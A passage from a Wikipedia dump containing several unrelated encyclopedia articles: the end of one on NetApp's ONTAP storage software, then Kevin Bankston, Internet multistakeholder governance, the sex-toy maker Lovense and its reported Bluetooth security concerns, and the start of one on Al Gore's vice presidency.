Status Protocol (OCSP) for LDAP over TLS; iSCSI Endpoint Isolation to specify a range of IP addresses that can log in to the storage; limit the number of failed login attempts over SSH. NTP symmetric authentication supported starting with ONTAP 9.5. Software NetApp offers a set of server-based software solutions for monitoring and integration with ONTAP systems. The most commonly used free software is the ActiveIQ Unified Manager & Performance manager, which is data availability and performance monitoring solution. Workflow Automation NetApp Workflow Automation (WFA) is a free, server-based product used for NetApp storage orchestration. It includes a self-service portal with a web-based GUI, where nearly all routine storage operations or sequences of operations can be configured as workflows and published as a service, so end users can order and consume NetApp storage as a service. SnapCenter SnapCenter, previously known as SnapManager Suite, is a server-based product. NetApp also offers products for taking application-consistent snapshots by coordinating the application and the NetApp Storage Array. These products support Microsoft Exchange, Microsoft SQL Server, Microsoft Sharepoint, Oracle, SAP and VMware ESX Server data. These products form part of the SnapManager suite. SnapCenter also includes third-party plugins for MongoDB, IBM DB2, MySQL, and allows the end user to create their own plugins for integration with the ONTAP storage system. SnapManager and SnapCenter are enterprise-level licensed products. A similar, free, and less capable NetApp product exists, named SnapCreator. It is intended for customers who wish to integrate ONTAP application-consistent snapshots with their applications, but do not have a license for SnapCenter. NetApp claims that SnapCenter capabilities will expand to include SolidFire storage endpoints. SnapCenter has controller based licensing for AFF/FAS systems and by Terabyte for SDS ONTAP. SnapCenter Plug-in for VMware vSphere called NetApp Data Broker is a separate Linux-based appliance which can be used without SnapCenter itself. Services Level Manager NetApp Services Level Manager or NSLM for short is software for provisioning ONTAP storage that delivers predictable performance, capacity and data protection for a workload which exposes RESTful APIs and has built-in Swagger documentation with the list of the available APIs, and also can be integrated with other NetApp storage products like ActiveIQ Unified Manager. NSLM exposes three standard service levels (SSL) based on service level objectives (SLO) and creates custom service levels. NSLM created to provide predicted ServiceProvider-like storage consumption. NSLM is a space-based licensed product. Big Data ONTAP systems have the ability to integrate with Hadoop TeraGen, TeraValidate and TeraSort, Apache Hive, Apache MapReduce, Tez execution engine, Apache Spark, Apache HBase, Azure HDInsight and Hortonworks Data Platform Products, Cloudera CDH, through NetApp In-Place Analytics Module (also known as NetApp NFS Connector for Hadoop) to provide access and analyze data by using external shared NAS storage as primary or secondary Hadoop storage. Qtrees A qtree is a logically defined file system with no restrictions on how much disk space can be used or how many files can exist. In general, qtrees are similar to volumes. However, they have the following key restrictions: Snapshot copies can be enabled or disabled for individual volumes but not for individual qtrees. Qtrees do not support space reservations or space guarantees. Automation ONTAP provisioning & usage can be automated in many ways directly or with the use of additional NetApp Software or with 3rd party software. Direct HTTP REST API available with ONTAP and SolidFire. Starting with 9.6 ONTAP NetApp decided to start bringing proprietary ZAPI functionality via REST APIs access for cluster management. REST APIs available through System Manager web interface at https://[ONTAP_ClusterIP_or_Name]/docs/api, the page includes Try it out feature, Generate the API token to authorize external use and built-in documentation with examples. List of cluster management available through REST APIs in ONTAP 9.6: Cloud (object storage) targets Cluster, nodes, jobs and cluster software Physical and logical network Storage virtual machines SVM name services such as LDAP, NIS, and DNS Resources of storage area network (SAN) Resources of Non-Volatile Memory Express ONTAP SDK software is a proprietary ZAPI interface to automate ONTAP systems PowerShell commandlets available to manage NetApp systems including ONTAP, SolidFire & E-Series SnapMirror & FlexClone toolkits written in Perl can be used for SnapMirror & FlexClone managing with scripts ONTAP can be automated with Ansible, Puppet, and Chef scripts NetApp Workflow Automation (WFA) is GUI based orchestrator which also provides APIs and PowerShell commandlets for WFA. WFA can manage NetApp ONTAP, SolidFire & E-Series storage systems. WFA provides a built-in self-service portal for NetApp systems known as Storage as a Service (STaaS) VMware vRealize Orchestrator with WFA can orchestrate storage 3rd party orchestrators for PaaS or IaaS like Cisco UCS Director (Previously Cloupia) and others can manage NetApp systems; automated workflows can be created with step by step instructions to manage & configure infrastructure through the built-in self-service portal NetApp SnapCenter software used to integrate Backup & Recovery on NetApp storage with Applications like VMware ESXi, Oracle DB, MS SQL, etc., can be automated through PowerShell commandlets and RESTful API ActiveIQ Unified Manager & Performance manager (formally OnCommand Unified) for monitoring NetApp FAS/AFF storage systems, performance metrics, and data protection also provide RESTful API & PowerShell commandlets OnCommand Insight is monitoring and analysis software for heterogeneous infrastructure including NetApp ONTAP, SolidFire, E-Series & 3rd party storage systems & switches provide RESTful API and PowerShell commandlets NetApp Trident plugin for Docker used in Containers environments to provide persistent storage, automate infrastructure or even run infrastructure as a code. It can be used with NetApp ONTAP, SolidFire & E-Series systems for SAN & NAS protocols. Platforms The ONTAP operating system is used in storage disk arrays. There are three platforms where ONTAP software is used: NetApp FAS and AFF, ONTAP Select and Cloud Volumes ONTAP. On each platform, ONTAP uses the same kernel and a slightly different set of features. FAS is the richest for functionality among other platforms. FAS FAS and All Flash FAS (AFF) systems are proprietary, custom-built hardware by NetApp for ONTAP software. AFF systems can contain only SSD drives, because ONTAP on AFF is optimized and tuned only for Flash memory, while FAS systems may contain HDD (HDD-only systems) or HDD and SSD (Hybrid systems). ONTAP on FAS and AFF platforms can create RAID arrays, such as RAID 4, RAID-DP and RAID-TEC arrays, from disks or disk partitions for data protection reasons, while ONTAP Select and Cloud Volumes ONTAP leverage RAID data protection provided by the environment they run on. FAS and AFF systems support Metro Cluster functionality, while ONTAP Select and Cloud Volumes ONTAP platforms do not. Software-Defined Storage Both ONTAP Select and Cloud Volumes ONTAP are virtual storage appliances (VSA) which are based on previous product ONTAP Edge also known as ONTAP-v and considered as a Software-defined storage. ONTAP Select as Cloud Volumes ONTAP includes plex and aggregate abstractions, but didn't have a lower level RAID module included in the OS; therefore RAID 4, RAID-DP and RAID-TEC were not supported so ONTAP storage system similarly to FlexArray functionality leverages RAID data protection on SSD and HDD drive level with underlying storage systems. Starting with ONTAP Select 9.4 & ONTAP Deploy 2.8 software RAID supported with no requirements for 3rd party HW RAID equipment. Because ONTAP Select and Cloud Volumes ONTAP are virtual machines, they don't support Fibre Channel and Fibre Channel over Ethernet as front-end data protocols and consume space from underlying storage in hypervisor added to VSA as virtual disks represented and treated inside ONTAP as disks. ONTAP Select and Cloud Volumes ONTAP provide high availability, deduplication, resiliency, data recovery, robust snapshots which can be integrated with application backup (application consistent snapshots) and nearly all ONTAP functionality but with few exceptions. Software-defined versions of ONTAP have nearly all the functionality except for Hardware-centric features like ifgroups, service processor, physical disk drives with encryption, MetroCluster over FCP, Fiber Channel protocol. ONTAP Select ONTAP Select can run on VMware ESXi and Linux KVM hypervisors. ONTAP Select leveraged RAID data protection on SSD and HDD drive level with underlying DAS, SAN, or vSAN storage systems. Starting with ONTAP Select 9.4 & ONTAP Deploy 2.8 software RAID supported with no requirements for 3rd party HW RAID equipment for KVM and starting with ONTAP 9.5 with ESXi. ONTAP Deploy is a virtual machine that provides a mediator function in MetroCluster or 2-node configurations, keeps track of licensing, and used to initial cluster deployment. Starting with ONTAP Deploy 2.11.2 vCenter plugin was introduced, which allows performing all the ONTAP Deploy functionality from vCenter. In contrast, previously management performed from either command line or with vSphere VM OVA setup master. Like on the FAS platform, ONTAP Select supports high availability and clustering. As a FAS platform, ONTAP Select is offered in two versions: HDD-only or All-Flash optimized. Previously ONTAP Select known as Data ONTAP Edge. Data ONTAP Edge product has Data ONTAP OS with version 8 and was able to run only atop of VMware ESXi. Starting with ONTAP 9.5 SW-MetroCluster over NSX overlay network supported. Starting with ONTAP 9.5 licensing changed from capacity tier-based, where licenses are linked with a node and perpetual to Capacity Pool Licensing with a time-limited subscription. ONTAP Select 9.5 get MQTT protocol supported for data transferring from the edge to a data center or a cloud. In April 2019, Octavian Tanase SVP ONTAP, posted a preview photo in his twitter of ONTAP running in Kubernetes as a container for a demonstration. Cloud Volumes ONTAP Cloud Volumes ONTAP (formally ONTAP Cloud) includes nearly the same functionality as ONTAP Select, because it is also a virtual storage appliance (VSA) and can be ordered in hyper-scale providers (cloud computing) such as Amazon AWS, Microsoft Azure and Google Cloud Platform. IBM Cloud uses ONTAP Select for the same reasons, instead of Cloud Volumes ONTAP. Cloud Volumes ONTAP can provide high availability of data across different regions in the cloud. Cloud Volumes ONTAP leverages RAID data protection on SSD and HDD drive level with underlying IP SAN storage system in Cloud Provider. Feature comparison Applicable Feature comparison between platforms with the latest ONTAP version. See also Write Anywhere File Layout (WAFL), used in NetApp storage systems NetApp NetApp FAS External links ONTAP Data Management Software (product page) ONTAP Cloud (product page) ONTAP Select (product page) ONTAP 9 Datasheet References Operating system families
55801828
https://en.wikipedia.org/wiki/Kevin%20Bankston
Kevin Bankston
Kevin Stuart Bankston (born July 2, 1974) is an American activist and attorney, who specialized in the areas of free speech and privacy law. He is currently Privacy Policy Director at Facebook, where he leads policy work on AI and emerging technologies. He was formerly the director of the Open Technology Institute (OTI) at the New America Foundation in Washington, D.C. Education Bankston earned a BA at the University of Texas at Austin. In 2001 he completed a Juris Doctorate at the University of Southern California. Career In his early career Bankston served, from 2001 until 2002, as a Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union (ACLU) in New York City. At the ACLU he litigated Internet-related free speech cases. He then joined the Electronic Frontier Foundation in 2003 as an Equal Justice Works/Bruce J. Ennis Fellow. From 2003 until 2005 he studied the impact anti-terrorism-related surveillance initiatives had on online privacy and free speech after 9/11. At the EFF he specialized in free speech and privacy law and later became senior staff attorney. In the EFF’s lawsuits against the National Security Agency (NSA) and AT&T where the lawfulness of the NSA’s warrantless wiretapping program was challenged, Bankston was a lead counsel. After working for almost ten years at the EFF Bankston joined the Center for Democracy & Technology (CDT) in Washington, D.C. in early 2012. As senior counsel and the director of the Free Expression Policy Project he advocated a variety of internet and technology policy issues at the Nonprofit organization. In November 2013 he spoke before the Senate Committee on the Judiciary, Subcommittee on Privacy, Technology and the Law on The Surveillance Transparency Act of 2013. He later became the director of the Open Technology Institute (OTI) at the New America Foundation in Washington DC. Affiliations Since 2005 he serves on the board of the First Amendment Coalition, a non-profit public interest organization He was a nonresidential fellow at the Stanford Law School’s Center for Internet & Society Publications The Washington Post, Opinions: The books, films and John Oliver episodes that explain encryption (March 25, 2016) Just Security: It’s Time to End the "Debate" on Encryption Backdoors (July 7, 2015) Lawfare, encryption: Ending The Endless Crypto Debate: Three Things We Should Be Arguing About Instead of Encryption Backdoors (June 14, 2017) Electronic Frontier Foundation: EFF Analysis of the Security and Freedom Ensured Act (S. 1709) (October 30, 2003) CNN: A year after Edward Snowden, the real costs of NSA surveillance (Co-author with Danielle Kehl) While working for EFF, Bankston wrote dozens of articles for "Deeplinks Blog" References 1974 births Living people American civil rights activists American lawyers University of Texas at Austin alumni USC Gould School of Law alumni American Civil Liberties Union people Electronic Frontier Foundation people Stanford Law School faculty American political writers New America (organization)
55811237
https://en.wikipedia.org/wiki/Internet%20multistakeholder%20governance
Internet multistakeholder governance
Multistakeholder participation is a specific governance approach whereby relevant stakeholders participate in the collective shaping of evolutions and uses of the Internet. In 2005, the Working Group in Internet Governance (WGIG), set up by the World Summit on the Information Society (WSIS), defined Internet governance as: 'development and application by Governments, the private sector and civil society, in their respective roles, of shared principles, norms, rules, decision-making procedures, and programs that shape the evolution and use of the Internet'. This is not identical to undifferentiated public participation in Internet issues. Instead, the concept of 'multistakeholder' signals specifically the distinct clusters of interests involved in any given digital issue and how these interests can be aggregated into decisions towards an Internet for the general interest, rather than being captured by a single power center. The general principle of participation in decision-making that impacts on the lives of individuals has been part of the Internet from its outset, accounting for much of its success. It recognizes the value of multistakeholder participation, incorporating users and a user-centric perspective as well as all other actors critical to developing, using and governing the Internet across a range of levels. The other principles are enriched by the multistakeholder participation principle, because it states that everyone should have a stake in the future of the Internet. It is possible to define a number of broad categories of stakeholders in the Internet, with subgroups as well: State, businesses and industries, non-governmental actors, civil society, international governmental organization, research actors, individuals, and others. Each of these categories has more or less unique stakes in the future of the Internet, but there are also areas of great overlap and interdependence. For instance, some NGOs, are likely to prioritize the promotion of human rights; meanwhile parliaments are primary actors in defining laws to protect these rights. Still other stakeholders are key to shaping rights online, such as search engine providers, and Internet Service Providers (ISPs). Individuals also have particular roles to play in respecting, promoting and protecting rights. Internet governance Internet governance Internet governance is the development and application of shared principles, norms, rules, decision-making procedures, and programs that shape the evolution and use of the Internet. Internet governance should not be confused with e-governance, which refers to governments' use of technology to carry out their governing duties. Although some argue that Internet governance 'as a unitary regime may in fact be an impossibility', a broader conceptualisation of governance recognises both the entirety and the diversity of governance activities that steer the “ship”. The Tunis Agenda for the Information Society, defines Internet governance as: "the development and application by governments, the private sector and civil society, in their respective roles, of shared principles, norms, rules, decision-making procedures, and programmes that shape the evolution and use of the Internet." Specificity It is often argued that multistakeholder participation is better, at least in principle, 'than governance by governments alone', as it can uphold the interests of non-elected actors in relation to governments (most of which are elected, although others not). In addition, governments may lack the necessary competence and/or adequate political will in relation to expert and benign Internet governance. Multistakeholder participation more broadly can be posited as a way to prevent capture of the Internet by one constituency to the expense of another – whether this is capture by various state actors and their interstate organizations, or by private sector interests nationally or internationally. In other words, governments themselves have an interest in multistakeholder modalities as a way to prevent Internet capture by other power centers.The participation of more stakeholders can inject expertise and reflect a diversity of needs. The legitimacy thus ascribed to multistakeholder decision-making is closely tied to 'the expectation of a higher quality of policy outcomes', or simply 'better governance'. The reality of multistakeholder participation is sometimes challenged by issues that relate both to the nature of the Internet itself – including jurisdiction and enforcement, scale, and the pace at which it changes and grows – as well as challenges pertaining to its governance. Stakeholders Broadly taken, the notion of stakeholders considers anyone or any entity with a legitimate interest in a particular Internet governance issue as a 'stakeholder'. It recognizes that not all stakeholders automatically self-realize or self-identify as stakeholders, and not all multistakeholder processes include all stakeholders. It further recognizes that multistakeholder-based participation represents interests-based participation, rather than undifferentiated, individual or idiosyncratic involvement by members of the public. Multistakeholder approaches should welcome and not exclude disagreement and minority or less-popular viewpoints, but may justifiably exclude disruptive actors who deploy disagreement to unreasonably disrupt the process or to damage trust. Gender divides are a significant and pressing challenge facing the Universality of the Internet ecosystem – ranging from women's ability to access and benefit the Internet to their ability to participate meaningfully in multistakeholder processes. Gender itself can be described as 'the social and cultural constructs that each society assigns to behaviors, characteristics and values attributed to men and women, reinforced by symbols, laws and regulations, institutions, and perceptions.' There is continued disagreement about what the definition of multistakeholder participation in governance actually is or should be, issues of due recognition, the scope of participation and unequal nature of representation – particularly from developing countries and civil society participants, the (in)ability to reach consensus, the exclusivity of some ostensibly inclusive processes and the unwillingness to listen to different views, attempts to establish legitimacy, the sometimes slow pace of multistakeholder mechanisms, as well as the increasing number of stakeholders and complexity of challenges involved as the importance of the Internet to everyday life and economies becomes increasingly clear. All these challenges are significant and sometimes they differ depending on the context and issue or topic at hand. However, three general concerns that are frequently mentioned in the literature, relate to the conspicuous dominance or absence of certain participants, especially the private sector; how multistakeholder mechanisms should be balanced with multilateral arrangements; and what the relationship between Internet governance at national and international levels is or should be. The evolution of multistakeholder participation Multistakeholder participation and governance mechanisms may be a 'rather recent invention', but they have a longer tradition as an 'organizing principle and political practice'. Such approaches are far from unique to Internet governance; with claims of their application and use especially prevalent in topics with cross-border or international relevance. Examples include labour relations, environmental protection, finance, human rights, and sustainable development. Where the Internet is concerned, multistakeholder participation in its governance seems to possibly be both intrinsic – and more complicated – than in many other instances of multistakeholder participation. The ways in which the Internet was designed has both allowed and disallowed specific types of behaviour online; meaning that the actions that led to the creation of the Internet were already acts of governance (albeit most likely unintended). Although some have argued that the Internet is free from any regulatory oversight or jurisdictional restraints and should remain so, the Internet internally was never entirely a rule-free nor a 'law-free zone', nor was it a different universe to external legal constraints. Due to its unique design and composition, many have argued that the Internet requires non-traditional forms of governance – and particularly governance forms encouraging the participation of more stakeholders in addition to governments (democratic or otherwise), which have been the key agent of governance in the Westphalian system of national states. The Internet is often cited as not only one of the prime examples of multistakeholder participation in governance, but sometimes described as inherently 'multistakeholder'. The Internet is defined by open, distributed, interconnected, participatory, and bottom-up processes – features that match multistakeholder participation in specific regard to its governance. Vint Cerf, one of the authors of the Internet Protocol (IP), has similarly noted that: "There is no question in my mind that the diversity of players in the Internet universe demands a multi-stakeholder approach to governance in the most general sense of the word. The debate around how the Internet is or should be governed has in some ways evolved from a discussion of how/whether the Internet can be governed to one concerning 'whether there is (or should be) something new and different about the way we do so". Cerf's words 'in the most general sense of the word' are important, as they also underpin the view that an understanding of multistakeholder approaches should not be approached in a dogmatic manner. The demand for and value of multistakeholder participation in Internet governance was first explicitly expressed at the WSIS, which took place in two phases between 2003 (in Geneva, Switzerland, with a focus on principles) and 2005 (in Tunis, Tunisia, with a focus on implementation). Multistakeholder governance in practice KICTANet Kenya is widely regarded as a leading developing country participant in the global Internet governance field and has one of the most vibrant Internet governance communities in Africa. Kenya's information and communications technology (ICT) evolution, explains Professor Bitange Ndemo, who previously served as Kenya's Permanent Secretary for ICT, was catalysed during President Mwai Kibai's administration (2003-2013). This 'golden decade' for ICT innovation spurred numerous policy developments in the country's ICT sector, along with corresponding success stories like the innovative mobile financial service M-PESA. It saw the creation of not only the world's first national and regional IGF initiatives, but also an oft-lauded multistakeholder platform for deliberation on policy and other developments pertaining to the ICT sector in October 2004, the Kenya ICT Action Network (KICTANet). Alice Munyua, who was part of Kenya's civil society delegation to WSIS, explains that shortly after WSIS she was commissioned to support the development of Kenya's ICT sector as a part of Catalysing Access to ICT in Africa (CATIA), a development programme which was supported by the UK Department for International Development (DFID). Recognizing the ICT policy gap in Kenya, Munyua commissioned research to determine which stakeholders would need to be consulted or engaged in developing a new ICT policy for the country. As she later advised in a co-written volume: It is useful to carry out a stakeholder analysis at the beginning of a multi-stakeholder process to ensure that there is a clear understanding of who should be involved in the process, to what extent, and at what time during the process. Using the results of the Kenya stakeholder analysis, participants from the media, business, civil society, academic, and development sectors were invited to an initial meeting in October 2004. KICTANet was created as a loose alliance at this meeting with the specific aim of developing an ICT policy framework for the country. It was specifically designed to welcome multistakeholder participation due to the 'perceived strength and effectiveness in joint collaborative policy advocacy activities, which would be based on pooling skills and resources,' as opposed to wasting resources in 'competing, overlapping advocacy'. Its operating slogan was, 'let's talk though we may not agree'. Tina James, who worked with CATIA when it supported the creation of KICTANet, points out: 'the creation of KICTANet was just the right process at the right time.' With government and other stakeholders apparently relying on it, KICTANet therefore continued after the ICT policy was adopted, leading to 'quite a lot of successes' like the 2010 Kenya ICT Master Plan, as well as the regulatory approval of M-Pesa and Voice over Internet Protocol (VOIP) services in the country. It also, for instance, participated in discussions that led to the drafting and passing of the National Cybersecurity Strategy (2014) and coordinated public participation in consultations like the 2014 African Union Convention on Cybersecurity. By managing a website and mailing list with almost 800 participants from diverse stakeholder groups, it has been described as 'perhaps the biggest virtual convener of ICT stakeholders in Kenya'. Grace Mutung'u, a KICTANet associate responsible for policy and regulatory analysis, worries that Kenya's Internet governance capacity is still limited to a 'small bubble'; leading to doubts about what the network's actual capacity and influence is in the country. The Marco Civil The Marco Civil da Internet, otherwise known as the Brazilian Internet Bill of Rights or the Brazilian Civil Rights Framework for the Internet, was sanctioned by then president Dilma Rousseff at the time of the NETMundial meeting in 2014. This case is viewed as one of the first attempts for initiatives to become more concrete, formal, accountable, and tangible, rather than merely aspirational, and identifiable therefore as being covered by what has come to be known as the 'digital constitutionalism umbrella'. The Marco Civil process also shows that multistakeholder processes are 'a compelling hallmark of digital constitutionalism'. The Marco Civil therefore emerged as a rights-based response to the 'Azeredo' Bill. The process began in 2009 when the Ministry of Justice's Office of Legislative Affairs (SAL/MJ) requested the Centre for Technology and Society at Getulio Vargas Foundation (CTS-FGV) to help coordinate a process of public consultations engaging all stakeholders, including those who had been vocal in opposing the Azeredo Bill. SAL/MJ enabled public consultations using a portal administered by the Ministry of Culture. SAL's principal reason for using this platform was that the participatory process enabled by the online platform would serve as a complementary branch to the traditional legislative process. As some analysts point out: "Once it became clear that Brazil needed a bill of rights for the Internet, it also became clear that the Internet itself could and should be used as a tool for drafting the legislation". The period of public comments was divided into two phases. The first phase involved consulting with the general public regarding certain principles proposed for debate, while the second phase involved examining each article and paragraph of the proposed draft bill. A focus group participant pointed out that dividing the process into these two phases allowed stakeholders sufficient time to develop positions on key aspects of the Bill. After the process of public consultations, the Marco Civil was introduced in the National Congress on 24 August 2011. The bill was submitted to the House of Representatives on several occasions but was unable to make further progress in parliament. Carlos Affonso Souza, director of the Institute for Technology and Society of Rio de Janeiro (ITS Rio), remembers that this moment in the bill's development coincided with a change of administration and became a 'crucial moment' with concerns as to whether the Bill would withstand political constraints and change: People began to wonder if the multistakeholder effort that took us so long to achieve was being put in peril because of this change of administration. The Marco Civil only resurfaced on the national legislative agenda in 2013 when Edward Snowden, an ex-National Security Agency (NSA) contractor, made revelations regarding pervasive surveillance practices by certain intelligence agencies. In September 2013, Rousseff decided that the bill should be tabled in the House of Representatives and the Senate with constitutional urgency. The final version explicitly notes that to aid the development of the Internet in Brazil, mechanisms must be established to enhance and guarantee multistakeholder, transparent, collaborative, and democratic participation between private actors, civil society, and academia (Art. 24). While the WSIS process outcomes and CGI.br Principles also provide important reference points for Brazil's adoption of multistakeholder approaches in international fora where Internet governance is concerned. South Korea's case The Constitutional challenge in the Republic of South Korea illustrates not only a multistakeholder model but also the importance of having strong institutions like an independent judiciary to protect human rights online. On 24 August 2012, the South Korean Constitutional Court unanimously ruled that certain user identity verification provisions in the country were unconstitutional. For five years, the provisions had required all major website operators in the Republic of South Korea to obtain, verify, and store personal identification details from any user wanting to post anything on their platforms. This constitutional challenge shows how the stakeholders collaborated to bring this challenge before the Constitutional Court of South Korea. The consequences of the provisions were widespread and attracted both local and global criticism. For instance, Frank La Rue, then the United Nations (UN) Special Rapporteur on the Promotion and Protection of Freedom of Expression, undertook a mission to South Korea in May 2010 and expressed concerns about the condition of freedom of expression in the country. While he acknowledged the need to protect citizens from 'legitimate concerns regarding crimes perpetrated via the Internet and the responsibility of the Government to identify such persons', he also warned about potential chilling effects and the 'impact of such identification systems to the right to freedom of expression, which is rooted in anonymity'. Around 2008, certain South Korean Internet stakeholders – including academics, the business community, technical community, civil society, and participants from the legal community – started having frequent, informal meetings to discuss Internet policies and related issues. These discussions became more vibrant after YouTube disabled its Korean page and published a blog post explaining and defending its global stance on freedom of expression. The technical community provided information about how futile it was to try to identify users accurately or to measure the number of unique visitors to a page; while the business community provided data on the costs of establishing, storing, and managing such a system safely. Civil society organizations presented concerns to the Court about the effects the provisions were having on fundamental rights and the value of online anonymity. The Constitutional Court issued a unanimous ruling on 24 August 2012 that the provisions were unconstitutional for reasons ranging from the effect of the provisions on freedom of expression, freedom of the media, the right to privacy, and the unfair costs incurred by website operators. Professor Keechang Kim considers that: "What happened in South Korea really shows some of the very serious shortcomings or negative consequences if Internet-related policies are taken in a very one-sided, top-down manner." This case shows that reactive multistakeholder collaboration can be useful in addressing challenges, like restrictive legislation, that infringe upon Internet Universality (in this case freedom of expression and privacy rights) in one way or another. The Internet Governance Forum The Internet Governance Forum (IGF) is created by the WSIS and, more specifically, the Tunis Agenda. Despite scepticism and criticism relating to, among other things, the IGF's ability to influence policy and/or to act as an Internet governance body, it has been described as integrally 'part of the fabric of internet governance and as 'a type of new laboratory' in which to 'promote multistakeholderism through multistakeholderism'. One writer, for instance, points out that: "The IGF is the first organisation in Internet governance whose founding was explicitly based on the multi-stakeholder principle." The IGF's Best Practice Forum (BPF) on Gender, more specifically, global focused, gender dimensioned, broader public policy emphasised. Also, the case introduces interesting questions pertaining to how multistakeholder participation is affected when disruptive actors participate in a process or activity. The IGF's mandate is tasked with, among other things, discussing public policy issues related to key elements of Internet governance by facilitating the exchange of information and best practices and by making 'full use of the expertise of the academic, scientific and technical communities'. It is, at least in theory, multistakeholder in composition, and should furthermore strengthen and enhance 'the engagement of stakeholders in existing and/or future Internet governance mechanisms, particularly those from developing countries'. To enrich the potential for more tangible outputs, the IGF's Multistakeholder Advisory Group (MAG) and Secretariat developed an intersessional programme intended to complement other IGF activities, such as regional and national IGF initiatives (NRIs), dynamic coalitions (DCs) and so-called best practice forums (BPFs). The outputs from this programme were designed to 'become robust resources, to serve as inputs into other pertinent forums, and to evolve and grow over time'. In 2015, the MAG decided to devote one of six BPFs to a gender-related challenge facing the Internet. Jac sm Kee of the global civil society organization Association for Progressive Communications (APC), who was one of the lead coordinators of the BPF Gender in 2015 and 2016, says that gender was increasingly becoming a pressing issue in Internet governance discussions at the time, which was why she originally proposed it to the MAG. While there was debate within the MAG as to what such a BPF should be focusing on, Kee takes the view that 'because of the multistakeholder nature' of MAG meetings and programme development procedures, whatever is proposed tends to be 'taken on'. In 2015, the BPF Gender focused more specifically on online abuse and gender-based violence as 'an increasingly important and focused area' in the field of gender and Internet governance. Each year the BPF coordinators and rapporteur adopted a semi-structured methodology by organizing fortnightly virtual calls to introduce the topic to stakeholders, to welcome broader participation, to define the scope of the BPF's priorities, and to investigate proposed methodologies that could encourage multistakeholder participation. In 2016, the BPF also tried to involve more stakeholders from other regions by arranging onsite meetings at certain NRIs, including Brazil IGF, Asia-Pacific Regional IGF (APrIGF), the IGF of Latin America, and the Caribbean (LACIGF). These sessions were used to gather local best practices and to raise awareness of the BPF's work. Where possible, lessons and stories gathered from these events were integrated into the BPF's outcome report in 2016. The case of the IGF's BPF Gender illustrates the difficulties of promoting multistakeholder participation in Internet governance when certain, especially potentially contentious, topics are involved. It similarly shows the potential chilling effects that the participation of disruptive actors might have on a volunteer-driven, multistakeholder process. In that sense, it demonstrates the need to sometimes balance the values of openness and transparency often cherished in multistakeholder processes at the IGF with the need to also protect the safety and privacy of participants. Internet universality Concept Internet Universality is the concept that "the Internet is much more than infrastructure and applications, it is a network of economic and social interactions and relationships, which has the potential to enable Human rights, empower individuals and communities, and facilitate sustainable development. The concept is based on four principles stressing the Internet should be Human rights-based, Open, Accessible, and based on Multistakeholder participation. These have been abbreviated as the R-O-A-M principles. Understanding the Internet in this way helps to draw together different facets of Internet development, concerned with technology and public policy, rights and development." Indicators UNESCO is now developing Internet Universality indicators - based on the ROAM principles - to help governments and other stakeholders to assess their own national Internet environments and to promote the values associated with Internet Universality. The research process was envisioned to include consultations at a range of global forums and a written questionnaire sent to key actors, but also a series of publications on important Internet Freedom related issues as encryption, hate speech online, privacy, digital safety and journalism sources. The outcome of this multidimensional research will be publicized in June 2018. The final indicators will be submitted to the UNESCO Member States in the International Program for Development of Communication (IPDC) for endorsement. Values for effective multistakeholder practices (What if we all Governed the Internet?) Sources References Internet governance
55920197
https://en.wikipedia.org/wiki/Lovense
Lovense
Lovense is a Singapore-based teledildonics sex toy manufacturer known for its VR and smart sex toys, which can be controlled via Bluetooth using the Lovense mobile app. History The company was founded in 2009 when its founder was in a long-distance relationship, which sparked his interest in teledildonics. In 2013, the first app-based sex toys, Max and Nora were launched. In 2015, Lush was launched with help of $100,000 raised on the crowdfunding website IndieGogo. Since then, Lovense has released a number of toys including a Bluetooth butt plug to be controlled at a long-distance and an oscillating G-spot massager. In January 2021, the company announced the ability to participate in "digital orgies" with up to 100 strangers via the Lovense app. Security concerns In March 2021, researchers at ESET published a whitepaper on the potential security risks brought about by the use of digital sex toys. The researchers commented that Lovense devices contained "controversial" design choices, such as a lack of end-to-end encryption in image transfers and the fact that the devices operated using Bluetooth Low Energy technology, which meant devices could easily be detected and identified by a Bluetooth scanner. See also Teledildonics References Sex toy manufacturers Manufacturing companies of Singapore Manufacturing companies established in 2009 Singaporean brands 2009 establishments in Singapore Teledildonics
56017942
https://en.wikipedia.org/wiki/Vice%20presidency%20of%20Al%20Gore
Vice presidency of Al Gore
The vice presidency of Al Gore lasted from 1993 to 2001, during the Bill Clinton administration. Al Gore was the 45th vice president of the United States, being twice elected alongside Bill Clinton in 1992 and 1996. Campaign Although Gore had opted out of running for president (due to the healing process his son was undergoing after a car accident), he accepted the request of Bill Clinton to be his running mate in the 1992 United States presidential election on July 10, 1992. Clinton's choice was perceived as unconventional (as rather than pick a running mate who would diversify the ticket, Clinton chose a fellow Southerner who was close in age) and was criticized by some. Clinton stated that he chose Gore for his foreign policy experience, work with the environment, and commitment to his family. Known as the Baby Boomer Ticket and the Fortysomething Team, The New York Times noted that if elected, Clinton (who was 45) Gore (who was 44) would be the "youngest team to make it to the White House in the country's history." Theirs was the first ticket since 1972 to try to capture the youth vote, a ticket which Gore referred to as "a new generation of leadership." The ticket increased in popularity after the candidates traveled with their wives, Hillary and Tipper, on a "six-day, 1,000-mile bus ride, from New York to St. Louis." Gore also successfully debated against the other vice presidential candidates, Dan Quayle (a longtime colleague from the House and the Senate) and James Stockdale. The result of the campaign was a win by the Clinton-Gore ticket (43%) over the Bush-Quayle ticket (38%). Clinton and Gore were inaugurated on January 20, 1993 and were re-elected to a second term in the 1996 election. Economy and information technology Under the Clinton Administration, the U.S. economy expanded, according to David Greenberg (professor of history and media studies at Rutgers University) who argued that "by the end of the Clinton presidency, the numbers were uniformly impressive. Besides the record-high surpluses and the record-low poverty rates, the economy could boast the longest economic expansion in history; the lowest unemployment since the early 1970s; and the lowest poverty rates for single mothers, black Americans, and the aged." In addition, one of Gore's major works as Vice President was the National Performance Review, which pointed out waste, fraud, and other abuse in the federal government and stressed the need for cutting the size of the bureaucracy and the number of regulations. Gore stated that the National Performance Review later helped guide President Clinton when he downsized the federal government. The economic success of this administration was due in part to Gore's continued role as an Atari Democrat, promoting the development of information technology, which led to the dot-com boom (c. 1995-2001). Clinton and Gore entered office planning to finance research that would "flood the economy with innovative goods and services, lifting the general level of prosperity and strengthening American industry." Their overall aim was to fund the development of, "robotics, smart roads, biotechnology, machine tools, magnetic-levitation trains, fiber-optic communications and national computer networks. Also earmarked [were] a raft of basic technologies like digital imaging and data storage." These initiatives met with skepticism from critics who claimed that their initiatives would "backfire, bloating Congressional pork and creating whole new categories of Federal waste." During the election and while Vice President, Gore popularized the term Information Superhighway (which became synonymous with the internet) and was involved in the creation of the National Information Infrastructure. The economic initiatives introduced by the Clinton-Gore administration linked to information technology were a primary focus for Gore during his time as Vice President. Gary Stix commented on these initiatives a few months 